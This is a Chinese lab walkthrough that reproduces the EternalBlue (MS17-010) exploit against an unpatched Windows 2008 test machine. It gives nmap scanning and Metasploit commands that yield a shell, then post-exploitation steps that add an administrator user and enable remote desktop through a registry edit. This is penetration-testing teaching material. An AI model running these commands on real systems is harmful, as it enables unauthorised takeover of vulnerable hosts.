漏洞复现之(MS17-010)

一、漏洞简介
1、永恒之蓝介绍:
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理:
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本:
目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、漏洞复现
复现环境:
攻击机:Linux kali(IP:192.168.6.128)

靶机:Windows 2008 (IP:192.168.6.134)

漏洞复现之(MS17-010)_第1张图片

实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙必须是关闭的!

复现过程:
1、主机发现:
登录 kali linux,用 nmap 探测本网段存活主机

nmap -sP 192.168.6.0/24

漏洞复现之(MS17-010)_第2张图片

探测端口开放情况 nmap 192.168.6.134

漏洞复现之(MS17-010)_第3张图片

可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。

 2、使用MSF的永恒之蓝漏洞模块(这里使用的finalshell)
打开MSF:msfconsole

漏洞复现之(MS17-010)_第4张图片

 搜索 ms17_010 代码:search ms17010

auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。

3、使用ms17-010攻击模块,对靶机进行攻击
使用模块:

use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标IP

set rhosts 192.168.6.134
可以使用 show options 命令查看设置选项

漏洞复现之(MS17-010)_第5张图片

exploit(执行攻击,本人用run攻击有时候会不成功,建议使用exploit)

 攻击成功(获得shell,可执行命令)

漏洞复现之(MS17-010)_第6张图片

 基本漏洞复现完成。

图中获得的shell显示乱码是因为未使用utf-8的原因,可使用 chcp 65001 命令去直接解决

漏洞复现之(MS17-010)_第7张图片

再查看命令就会发现乱码消失。 

漏洞复现之(MS17-010)_第8张图片

 

后续可执行操作(攻防使用)

添加用户net localgroup administrators 用户/add

开启3389端口开始远程监控操作

查看3389端口状态:netstat -ano

开启3389(REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f)

远程桌面连接靶机rdesktop 192.168.6.134:3389

使用创建用户登陆

后续操作只说明操作,具体还是看个人需求,本人不做实验截图。

你可能感兴趣的:(安全,linux,windows)